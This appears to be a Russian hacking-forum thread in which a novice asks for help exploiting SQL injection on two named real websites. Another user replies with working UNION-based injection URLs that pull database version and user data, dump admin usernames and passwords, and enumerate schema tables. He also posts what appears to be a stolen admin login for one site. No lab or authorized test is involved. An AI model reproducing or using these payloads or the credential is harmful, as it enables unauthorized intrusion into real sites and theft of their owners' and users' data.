Помогите пожалуйста.. — HackZona.Ru

Только начала изучать основы, в частности sql injection. Когда попыталась проверить знания на практике и, вроде, нашла уязвимость на одном сайте, не смогла подобрать кол-во колонок с order by, ошибку выдавал все время… ([url]http://www.cityonlinemarket.com/products.php?id=535[/url]) вот ссылка. На другом сайте ([url]http://www.heyne.com.au/gardencentre/historydb.php?ID=4[/url]) подобрать получилось, но так как я совсем уж новичок, дальше версии не продвинулась… Но в чем разница, разобраться так и не смогла :roll:

Помогите пожалуйста..

Сообщений в теме: 4
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Только начала изучать основы, в частности sql injection. Когда попыталась проверить знания на практике и, вроде, нашла уязвимость на одном сайте, не смогла подобрать кол-во колонок с order by, ошибку выдавал все время… ([url]http://www.cityonlinemarket.com/products.php?id=535[/url]) вот ссылка. На другом сайте ([url]http://www.heyne.com.au/gardencentre/historydb.php?ID=4[/url]) подобрать получилось, но так как я совсем уж новичок, дальше версии не продвинулась… Но в чем разница, разобраться так и не смогла :roll:
Нравится
Не нравится
Репутация: 0
Рейтинг: 6
Кол-во тем: 0
Сообщения: 144
[code]http://www.cityonlinemarket.com/products.php?id=535+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+--+
www.cityonlinemarket.com/products.php?id=535+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12+from+admin+--+
[URL=«www.cityonlinemarket.com/products.php?ctype=&catid;=7&subid;=10&yeeho;=4»]cityonline:mono1314[/URL] [/code]
Нравится
Не нравится
Репутация: 0
Рейтинг: 6
Кол-во тем: 0
Сообщения: 144
[code]
www.heyne.com.au/gardencentre/historydb.php?ID=4+and+1=2+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7+--+
www.heyne.com.au/gardencentre/historydb.php?ID=4+and+1=2+union+select+concat_ws(0x3a,table_schema,table_name,column_name),2,3,4,5,6,7+from+information_schema.columns+--+
[/code]
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=smittt;145662][code]http://www.cityonlinemarket.com/products.php?id=535+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+--+
www.cityonlinemarket.com/products.php?id=535+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12+from+admin+--+
[URL=«www.cityonlinemarket.com/products.php?ctype=&catid;=7&subid;=10&yeeho;=4»]cityonline:mono1314[/URL] [/code][/QUOTE]

Спасибо большое
Нравится
Не нравится
Репутация: 0
Рейтинг: 6
Кол-во тем: 0
Сообщения: 144
А вот надо туда смотреть)
В информационной безопасности нет мелочей. Тут все важно и на все надо обращаться внимание. Успеха добьется самый внимательный!
Для того, чтобы отвечать в темах на форуме необходимо войти на сайт или зарегистрироваться.